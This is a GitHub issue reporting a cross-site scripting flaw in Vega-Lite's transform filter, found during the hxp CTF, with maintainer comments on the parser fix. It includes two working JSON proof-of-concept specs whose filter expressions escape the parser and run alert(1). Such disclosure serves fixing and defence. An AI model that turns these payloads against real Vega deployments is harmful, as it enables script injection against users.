
XSS in transform filter


This was found during the hxp ctf.

Credit

@cgvwzq and his writeup

  • Describe how to reproduce the bug / the goal of the feature request: Paste the below JSON in the Vega Editor. Working demo. You will see a ‘1’ alert dialog. To my understanding you should not be able to run arbitrary JS using vega-lite json, should you?
  • Provide an example spec in JSON, wrapped by triple backticks like this:
```json
{
  "data": {
    "values": [{}]
  },
  "transform": [
    {"filter": "(0//1/)-'\\\n,alert(1))))//'"}
  ],
  "mark": "bar"
}
```

Issue Analytics: state closed; created 3 years ago; 6 comments (5 by maintainers)

Top GitHub Comments

jheer commented, Dec 21, 2020 (1 reaction)

The error stemmed from the removal of comments from our parser, which opened the door to seeing “division by a regexp” instead. PR #3019 updates the parser to instead throw when a single-line comment // is encountered, which is the intended design.

domoritz commented, Dec 21, 2020 (0 reactions)

The issue also exists in Vega 2.

```json
{
  "data": [
    {
      "name": "data",
      "values": [{}],
      "transform": [
        {"type": "filter", "test": "(0//1/)-'\\\n,alert(1))))//'"}
      ]
    }
  ]
}
```

(try at https://vega.github.io/vega-editor/?mode=vega)

